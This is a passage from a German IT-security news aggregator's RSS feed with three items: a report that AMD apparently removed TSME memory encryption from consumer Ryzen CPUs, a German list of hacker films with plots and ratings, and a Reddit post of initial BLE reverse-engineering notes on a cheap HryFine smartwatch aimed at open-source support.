<guid isPermaLink="true">https://tsecurity.de/de/3600140/it-security-nachrichten/users-cry-foul-after-amd-stripped-memory-crypto-from-its-consumer-cpus/</guid>
<pubDate>Mon, 15 Jun 2026 22:12:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: A decade ago, AMD added a protection to its high-end CPUs to protect them against cold boot attacks and other types of physical exploits that siphon sensitive data out of the connected memory chips. Short for Transparent Secure Memory Encryption, TSME encrypts the entire contents stored in memory, making the data useless to physical attackers. Over time, AMD added TSME to lower-end processors, including the consumer version of its Ryzen chips, a CPU that costs less than the Pro version. Over the years, users of these lower-end chips have gotten used to the added security. Recently and without warning or notice, this lower-end line of AMD chips suddenly dropped the protection, and did so in a way that was impossible to detect on Windows machines and required a fair amount of technical work when using Linux.
 
AMD has yet to say why TSME worked on these CPUs, or even to confirm the change. AMD declined to answer questions sent by email other than to say TSME "is a security feature only applied to PRO CPUs as part of AMD PRO Technologies." The statement is the first known time the chipmaker has explicitly made this restriction public. [...] There's no indication that AMD ever advertised or marketed TSME as being available in consumer CPUs. AMD has long said that a related memory protection, Secure Memory Encryption (SME), is available only in the Pro and Epyc CPU tiers. SME is OS-managed. It uses a single key and allows the OS to selectively encrypt individual memory pages. TSME is firmware-managed. It encrypts all RAM with no OS involvement. When active, it provides protection against physical attacks, including cold boot exploits, DRAM interface snooping, and memory module removal. It activates silently when enabled in the BIOS, making it the more practically useful of the two protections. Ben Kilpatrick, a self-described "privacy-conscious Linux hobbyist," discovered that TSME had stopped working on his consumer Ryzen processor despite remaining enabled in the BIOS. He spent months investigating, persuaded MSI engineers to test multiple CPUs, motherboards, and firmware versions, and filed a public AMD bug report that traced the change to newer AGESA firmware apparently disabling TSME on consumer chips while retaining it on Pro and EPYC models.
 
"AMD engineers' comments, such as those mentioned above, and the years of TSME working just fine in the lower-cost tier processors, have understandably conditioned Kilpatrick and other users to reasonably regard it as an expected part of the chip package," reports Ars Technica. "AMD quietly removing it and providing no acknowledgment or explanation strikes these users as something of a betrayal."
 
Joe Fitzgerald, an expert in silicon-level security, said in an interview: "They could have not realized they did it leading to their cagey responses, or they could have done it intentionally and tried to get away with it, leading to the same cagey responses. But I really feel like an explanation should be in order, even if it was 'TSME was never supposed to be supported. We did ship some firmwares that erroneously enabled it, but you shouldn't use them since we can't guarantee it'll work properly.'"<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Users+Cry+Foul+After+AMD+Stripped+Memory+Crypto+From+Its+Consumer+CPUs%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F06%2F15%2F200234%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F06%2F15%2F200234%2Fusers-cry-foul-after-amd-stripped-memory-crypto-from-its-consumer-cpus%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/06/15/200234/users-cry-foul-after-amd-stripped-memory-crypto-from-its-consumer-cpus?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten Hacker-Filme]]></title>
<description><![CDATA[Vorsicht, dieses Film-Listicle kann zu Prokrastination verführen!Nomad Soul | shutterstock.com



Security-Profis und -Entscheider mit Hang zur Filmkunst müssen auch nach Feierabend nicht auf ihr Leib-und-Magen-Thema verzichten – einer Fülle cineastischer Ergüsse sei Dank. 



Das Film-Pflichtpro...]]></description>
<link>https://tsecurity.de/de/3599780/it-security-nachrichten/die-besten-hacker-filme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599780/it-security-nachrichten/die-besten-hacker-filme/</guid>
<pubDate>Mon, 15 Jun 2026 18:58:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/12/Hackerfilme_16z9_Nomad-Soul-shutterstock.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Die besten Hackerfilme CSO 16z9" class="wp-image-3616886" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Vorsicht, dieses Film-Listicle kann zu Prokrastination verführen!</p></figcaption></figure><p class="imageCredit">Nomad Soul | shutterstock.com</p></div>



<p>Security-Profis und -Entscheider mit Hang zur Filmkunst müssen auch nach Feierabend nicht auf ihr Leib-und-Magen-Thema verzichten – einer Fülle cineastischer Ergüsse sei Dank. </p>



<h2 class="wp-block-heading">Das Film-Pflichtprogramm für Security-Profis</h2>



<p>Wir haben die unserer Meinung nach besten (Achtung: Nerd-Brille erforderlich) Hacker-Filme nachfolgend für Sie zusammengestellt – in chronologischer Reihenfolge und inklusive Trailer der jeweiligen Originalfassung. Vielleicht entdecken Sie ja die ein oder andere Perle in unserer Zusammenstellung, die Sie noch nicht kennen – oder einfach viel zu lange nicht mehr gesehen haben.</p>



<p><strong><a href="https://www.imdb.com/title/tt0086567/" title="War Games (1983)" target="_blank" rel="noopener">War Games (1983)</a></strong></p>



<p><strong>Plot:</strong> Ein jugendlicher Hacker (Matthew Broderick) entdeckt durch Zufall eine Backdoor in einem Militärcomputer. Als er dort ein vermeintliches Spiel startet, droht eine nukleare Katastrophe. </p>



<p><strong>Genre:</strong> Action/Drama/Sci-Fi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,1/10</p></li>



<li><p>Rotten Tomatoes 94 %</p></li>



<li><p>Metacritic 77/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0105435/?ref_=fn_al_tt_1" title="Sneakers (1992)" target="_blank" rel="noopener">Sneakers (1992)</a></strong></p>



<p><strong>Plot:</strong> Ein (physischer) Penetration Tester (Robert Redford) und sein Team (unter anderem Sidney Poitier, Ben Kingsley und Dan Aykroyd) erhalten von der NSA einen Spezialauftrag und geraten zwischen die Fronten.</p>



<p><strong>Genre:</strong> Comedy/Krimi/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,1/10</p></li>



<li><p>Rotten Tomatoes 80 %</p></li>



<li><p>Metacritic 65/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0113243/?ref_=fn_al_tt_1" title="Hackers (1995)" target="_blank" rel="noopener">Hackers (1995)</a></strong></p>



<p><strong>Plot:</strong> Zwei berüchtigte Hacker (Angelina Jolie und Johnny Lee Miller) legen sich mit der Regierung an, entdecken dann jedoch die wahre Gefahr: bösartigere Hacker.</p>



<p><strong>Genre:</strong> Krimi/Drama/Romantik</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes 33 %</p></li>



<li><p>Metacritic 46/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0113957/?ref_=nv_sr_srsg_0" title="The Net (1995)" target="_blank" rel="noopener">The Net (1995)</a></strong></p>



<p><strong>Plot:</strong> Nachdem einer Softwareentwicklerin (Sandra Bullock) eine ominöse Diskette zugespielt wird, ist nichts wie es vorher war: Ihre Identität wird gestohlen, Menschen in ihrem Umfeld sterben unter mysteriösen Umständen.</p>



<p><strong>Genre:</strong> Action/Thriller/Krimi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,0/10</p></li>



<li><p>Rotten Tomatoes 43 %</p></li>



<li><p>Metacritic 51/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0126765/?ref_=nv_sr_srsg_3" title="23 (1998)" target="_blank" rel="noopener">23 (1998)</a></strong></p>



<p><strong>Plot:</strong> Der 19-jährige Hacker Karl Koch (August Diehl) ist davon überzeugt, im vom Kalten Krieg geprägten Deutschland der 1980er Jahre einer weltweiten Verschwörung auf der Spur zu sein. Als er vom russischen Geheimdienst rekrutiert wird, gerät sein Leben aus den Fugen.</p>



<p><strong>Genre: Biografie/</strong>Thriller/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,2/10</p></li>



<li><p>Rotten Tomatoes —</p></li>



<li><p>Metacritic —</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0133093/?ref_=nv_sr_srsg_0" title="The Matrix (1999)" target="_blank" rel="noopener">The Matrix (1999)</a></strong></p>



<p><strong>Plot:</strong> Der junge Hacker Neo (Keanu Reeves) erhält über seinen Computer mysteriöse Botschaften. Wenig später kämpft er mit den verbündeten Hackern Trinity (Carrie-Anne Moss) und Morpheus (Larence Fishburne) um das Überleben der Menschheit.</p>



<p><strong>Genre:</strong> Action/Sci-Fi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 8,7/10</p></li>



<li><p>Rotten Tomatoes 83 %</p></li>



<li><p>Metacritic 73/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0159784/?ref_=nv_sr_srsg_4" title="Takedown (2000)" target="_blank" rel="noopener">Takedown (2000)</a></strong></p>



<p><strong>Plot:</strong> Der Hacker Kevin Mitnick (Skeet Ulrich) verschätzt sich bei einem Angriffsversuch und gerät ins Visier des FBI.</p>



<p><strong>Genre:</strong> Biografie/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes —</p></li>



<li><p>Metacritic —</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0286751/?ref_=nv_sr_srsg_0" title="Pulse (2001)" target="_blank" rel="noopener">Pulse (2001)</a></strong></p>



<p><strong>Plot:</strong> Eine Gruppe junger Leute entdeckt Hinweise darauf, dass Geistwesen versuchen, über das Internet in die reale Welt zu gelangen. Im Jahr 2006 entstand ein gleichnamiges US-amerikanisches Remake des japanischen Originals.</p>



<p><strong>Genre:</strong> Horror/Sci-Fi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,5/10</p></li>



<li><p>Rotten Tomatoes 76%</p></li>



<li><p>Metacritic 68/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0244244/?ref_=nv_sr_srsg_0" title="Swordfish (2001)" target="_blank" rel="noopener">Swordfish (2001)</a></strong></p>



<p><strong>Plot:</strong> Ein Hacker (Hugh Jackman) wird von einem Gangster (John Travolta) engagiert, um einen Computerwurm für einen Bankraub zu erschaffen. Bald merkt er jedoch, dass die Dinge anders sind, als sie scheinen.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,5/10</p></li>



<li><p>Rotten Tomatoes 26%</p></li>



<li><p>Metacritic 32/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0408345/?ref_=nv_sr_srsg_0" title="Firewall (2006)" target="_blank" rel="noopener">Firewall (2006)</a></strong></p>



<p><strong>Plot:</strong> Ein IT-Chef (Harrison Ford) gerät ins Visier von Erpressern, die seine Familie bedrohen. Ein Kampf auf Leben und Tod entbrennt – der mit viel technologischem Knowhow geführt wird.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 5,8/10</p></li>



<li><p>Rotten Tomatoes 19%</p></li>



<li><p>Metacritic 45/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0337978/?ref_=nv_sr_srsg_0" title="Live Free or Die Hard (2007)" target="_blank" rel="noopener">Live Free or Die Hard (2007)</a></strong></p>



<p><strong>Plot:</strong> Cybercrime-Terroristen bringen die Ostküste der USA unter ihre Kontrolle. Zeit für Cop-Ikone John McClane (Bruce Willis) wieder einmal den Tag zu retten. Dazu braucht er die Unterstützung eines technisch talentierten aber ansonsten eher tollpatschigen Hackers (Justin Long).</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,1/10</p></li>



<li><p>Rotten Tomatoes 82%</p></li>



<li><p>Metacritic 69/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0880578/?ref_=nv_sr_srsg_0" title="Untraceable (2008)" target="_blank" rel="noopener">Untraceable (2008)</a></strong></p>



<p><strong>Plot:</strong> Eine FBI-Agentin (Diane Lane) stößt durch Zufall auf eine verstörende Webseite. Die Jagd auf den Webmaster wird zu einer mörderischen Jagd.</p>



<p><strong>Genre:</strong> Krimi/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes 16%</p></li>



<li><p>Metacritic 32/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt1132620/?ref_=nv_sr_srsg_5" title="The Girl with the Dragon Tattoo (2009)" target="_blank" rel="noopener">The Girl with the Dragon Tattoo (2009)</a></strong></p>



<p><strong>Plot:</strong> In Deutschland besser bekannt unter dem Titel “Verblendung”, erzählt der erste Teil von Stig Larssons Millenium-Trilogie die Geschichte der jungen Hackerin Lisbeth Salander (Noomi Rapace), die einen Kriminalkommissar (Mikael Nyqvist) bei der Aufklärung einer Mordserie unterstützt. Im Jahr 2011 entstand ein Remake des schwedischen Originals mit Beteiligung von James-Bond-Darsteller Daniel Craig.</p>



<p><strong>Genre:</strong> Krimi/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,8/10</p></li>



<li><p>Rotten Tomatoes 85%</p></li>



<li><p>Metacritic 76/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt1074638/?ref_=nv_sr_srsg_0" title="Skyfall (2012)" target="_blank" rel="noopener">Skyfall (2012)</a></strong></p>



<p><strong>Plot:</strong> Geheimagent James Bond (Daniel Craig) nimmt es mit einem Cyberterroristen (Javier Bardem) auf. Dabei wird seine Loyalität zu M (Judi Dench) auf eine harte Probe gestellt.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,8/10</p></li>



<li><p>Rotten Tomatoes 92%</p></li>



<li><p>Metacritic 81/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt1837703/?ref_=nv_sr_srsg_0" title="The Fifth Estate (2013)" target="_blank" rel="noopener">The Fifth Estate (2013)</a></strong></p>



<p><strong>Plot:</strong> Daniel Domscheit-Berg (Daniel Brühl) und Julian Assange (Benedict Cumberbatch) tun sich zusammen, um die Whistleblower-Onlineplattform WikiLeaks aus der Taufe zu heben. Das bleibt nicht ohne Folgen.</p>



<p><strong>Genre:</strong> Biografie/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes 35%</p></li>



<li><p>Metacritic 49/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt2717822/?ref_=nv_sr_srsg_0" title="Blackhat (2015)" target="_blank" rel="noopener">Blackhat (2015)</a></strong></p>



<p><strong>Plot:</strong> Als ein Hacker (Chris Hemsworth) von einem Freund um Unterstützung bei der Untersuchung einer Malware gebeten wird, kommen sie einem weltumspannenden Cybercrime-Netzwerk auf die Spur.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 5,5/10</p></li>



<li><p>Rotten Tomatoes 33%</p></li>



<li><p>Metacritic 52/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt3774114/?ref_=nv_sr_srsg_0" title="Snowden (2016)" target="_blank" rel="noopener">Snowden (2016)</a></strong></p>



<p><strong>Plot:</strong> Der ehemalige CIA- und NSA-Mitarbeiter Edward Snowden (Joseph Gordon-Levitt) entschließt sich, über die Cyber-Methoden und -Praktiken der Geheimdienste auszupacken. Das macht ihn in den USA zum Staatsfeind Nummer Eins.</p>



<p><strong>Genre:</strong> Biografie/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,3/10</p></li>



<li><p>Rotten Tomatoes 61%</p></li>



<li><p>Metacritic 58/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt5164214/?ref_=nv_sr_srsg_1" title="Ocean's Eight (2018)" target="_blank" rel="noopener">Ocean’s Eight (2018)</a></strong></p>



<p><strong>Plot:</strong> Eine erfahrene Kriminelle (Sandra Bullock) plant ihren nächsten großen Coup. Dabei erhält sie unter anderem Unterstützung durch eine Hackerin (Rihanna).</p>



<p><strong>Genre:</strong> Action/Comedy</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,3/10</p></li>



<li><p>Rotten Tomatoes 69%</p></li>



<li><p>Metacritic 61/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt7937254/?ref_=nv_sr_srsg_0" title="Silk Road (2021)" target="_blank" rel="noopener">Silk Road (2021)</a></strong></p>



<p><strong>Plot:</strong> Uni-Absolvent Ross Ulbricht (Nick Robinson) baut einen illegalen Marktplatz im Darknet auf, der es zu ungeahnter Popularität bringt. Das ruft jedoch auch die Behörden auf den Plan.</p>



<p><strong>Genre:</strong> Biografie<strong>/</strong>Drama/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,0/10</p></li>



<li><p>Rotten Tomatoes 51%</p></li>



<li><p>Metacritic 41/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/de/title/tt14128670/" target="_blank" rel="noreferrer noopener">Kimi (2022)</a></strong></p>



<p><strong>Plot:</strong> Tech-Spezialistin Angela Childs (Zoë Kravitz) entdeckt Aufnahmen, die auf ein Verbrechen hindeuten. Als sie versucht die Behörden einzuschalten, muss sie selbst um ihr Leben fürchten.</p>



<p><strong>Genre:</strong> Drama/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li>IMDb 6,3/10</li>



<li>Rotten Tomatoes 92%</li>



<li>Metacritic 79/100</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/de/title/tt11858890/?ref_=ttpl_ov" target="_blank" rel="noreferrer noopener">The Creator (2023)</a></strong></p>



<p><strong>Plot:</strong> In einer postapokalyptischen Welt tobt ein vernichtender Krieg zwischen Menschheit und künstlicher Intelligenz. Joshua (John David Washington) will den “Creator”, der die feindliche KI erschaffen hat, zur Strecke bringen.</p>



<p><strong>Genre:</strong> Science Fiction/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li>IMDb 6,7/10</li>



<li>Rotten Tomatoes 68%</li>



<li>Metacritic 63/100</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/de/title/tt26160190/?ref_=nv_sr_srsg_3_tt_8_nm_0_in_0_q_unlocked" target="_blank" rel="noreferrer noopener">Unlocked (2023)</a></strong></p>



<p><strong>Plot:</strong> Ein Stalker mit ausgeprägten Cybercrime-Fähigkeiten (Yim Si-wan) findet das Smartphone der Büroangestellten Na-mi (Chun Woo-hee), was deren gesamtes Leben auf den Kopf stellt.</p>



<p><strong>Genre:</strong> Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li>IMDb 6,4/10</li>



<li>Rotten Tomatoes 50%</li>



<li>Metacritic —</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Initial reverse engineering notes on a generic HryFine BLE smartwatch]]></title>
<description><![CDATA[Initial reverse engineering notes on a generic HryFine BLE smartwatch I recently found an old generic Apple Watch-style smartwatch that originally cost around ₹700–800 and uses the HryFine app. Since the watch becomes almost useless without the vendor app, I wanted to see whether it could be acce...]]></description>
<link>https://tsecurity.de/de/3599498/linux-tipps/initial-reverse-engineering-notes-on-a-generic-hryfine-ble-smartwatch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599498/linux-tipps/initial-reverse-engineering-notes-on-a-generic-hryfine-ble-smartwatch/</guid>
<pubDate>Mon, 15 Jun 2026 16:58:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>Initial reverse engineering notes on a generic HryFine BLE smartwatch</h1> <p>I recently found an old generic Apple Watch-style smartwatch that originally cost around ₹700–800 and uses the HryFine app.</p> <p>Since the watch becomes almost useless without the vendor app, I wanted to see whether it could be accessed directly from Linux and potentially supported by open-source tools in the future.</p> <h1>Device</h1> <ul> <li>Generic Apple Watch clone</li> <li>Uses HryFine companion app</li> <li>BLE-based communication</li> <li>Supports watch faces, notifications, Bluetooth calling, music control, camera control, alarms, etc.</li> </ul> <h1>Goal</h1> <p>The goal was not to hack the watch or modify firmware, but simply to determine:</p> <ol> <li>Whether the watch can be accessed without HryFine</li> <li>What BLE services it exposes</li> <li>Whether the protocol appears reverse-engineerable</li> <li>Whether open-source support might be possible</li> </ol> <h1>Environment</h1> <ul> <li>Manjaro Linux</li> <li>BlueZ / bluetoothctl</li> <li>Python</li> <li>Bleak</li> </ul> <h1>BLE Services Discovered</h1> <p>The watch exposes the following services:</p> <h1>Battery Service</h1> <p>UUID:</p> <p>0000180f-0000-1000-8000-00805f9b34fb</p> <p>Characteristic:</p> <p>00002a19</p> <p>Properties:</p> <p>read, notify</p> <h1>Device Information Service</h1> <p>UUID:</p> <p>0000180a-0000-1000-8000-00805f9b34fb</p> <p>Characteristics:</p> <ul> <li>2A25 Serial Number</li> <li>2A26 Firmware Revision</li> <li>2A27 Hardware Revision</li> <li>2A28 Software Revision</li> </ul> <p>Observed values:</p> <p>Firmware Revision: 10000</p> <p>Hardware Revision: 10000</p> <p>Serial Number: 10000005</p> <h1>Vendor Service (FF00)</h1> <p>Service:</p> <p>0000ff00-0000-1000-8000-00805f9b34fb</p> <p>Characteristics:</p> <p>FF01 -&gt; notify</p> <p>FF02 -&gt; write / write-without-response</p> <h1>Vendor Service (6E40)</h1> <p>Service:</p> <p>6e400001-b5a3-f393-e0a9-e50e24dcca9f</p> <p>Characteristics:</p> <p>6E400002 -&gt; write / write-without-response</p> <p>6E400003 -&gt; notify</p> <p>This UUID family is commonly associated with Nordic UART-style BLE communication.</p> <h1>Interesting Finding #1</h1> <p>The watch can be fully accessed from Linux without HryFine.</p> <p>Using Bleak I was able to:</p> <ul> <li>Connect</li> <li>Enumerate services</li> <li>Read characteristics</li> <li>Subscribe to notifications</li> <li>Write packets</li> </ul> <p>This confirms the device is not locked to the vendor application.</p> <h1>Interesting Finding #2</h1> <p>The FF00 service behaves like a command-response protocol.</p> <p>Writing data to FF02 consistently generated responses on FF01.</p> <p>Examples:</p> <p>00 -&gt; response received</p> <p>01 -&gt; response received</p> <p>02 -&gt; response received</p> <p>AA -&gt; response received</p> <p>55 -&gt; response received</p> <p>This suggests:</p> <p>FF02 = command input</p> <p>FF01 = command response</p> <p>The response packets appear structured and may contain checksums or status fields.</p> <h1>Interesting Finding #3</h1> <p>The 6E40 service appears to be the primary smartwatch data channel.</p> <p>While interacting with the watch, notifications began appearing on:</p> <p>6E400003</p> <p>Example packet prefixes:</p> <p>DF0024...</p> <p>DF0006...</p> <p>DF004C...</p> <p>These packets were generated by actual watch activity rather than fuzzing.</p> <p>This strongly suggests that 6E40 carries live smartwatch events and telemetry.</p> <h1>Interesting Finding #4</h1> <p>The protocol is structured.</p> <p>Packets are clearly not random.</p> <p>Examples:</p> <p>DF0006F70C0103000101</p> <p>DF0006F80C0104000101</p> <p>DF004C8C09010900470194550820020000138803</p> <p>The repeated packet structure suggests:</p> <p>Header</p> <p>Command ID</p> <p>Payload</p> <p>Flags</p> <p>Checksum</p> <p>or something similar.</p> <h1>Why this matters</h1> <p>A lot of extremely cheap smartwatches become electronic waste when:</p> <ul> <li>the vendor disappears</li> <li>the companion app is removed</li> <li>Android compatibility breaks</li> </ul> <p>Open-source support could potentially allow these devices to continue functioning long after the original software ecosystem disappears.</p> <p>Projects like Gadgetbridge have already demonstrated how valuable protocol reverse engineering can be for preserving older wearable hardware.</p> <h1>Current Status</h1> <p>Confirmed:</p> <p>✓ Direct BLE communication works</p> <p>✓ Linux access works</p> <p>✓ FF00 command protocol exists</p> <p>✓ 6E40 live data channel exists</p> <p>✓ Structured packets observed</p> <p>✓ Reverse engineering appears feasible</p> <p>Not yet done:</p> <p>✗ Protocol fully decoded</p> <p>✗ Watch face upload reverse engineered</p> <p>✗ Notification protocol decoded</p> <p>✗ Time sync protocol decoded</p> <h1>Looking for Input</h1> <p>I'm curious whether anyone has:</p> <ul> <li>seen this protocol before</li> <li>worked with HryFine devices</li> <li>recognized the packet formats</li> <li>identified the underlying chipset family</li> </ul> <p>Any pointers, documentation, similar projects, or previous reverse engineering efforts would be appreciated.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Traditional-Salt-814"> /u/Traditional-Salt-814 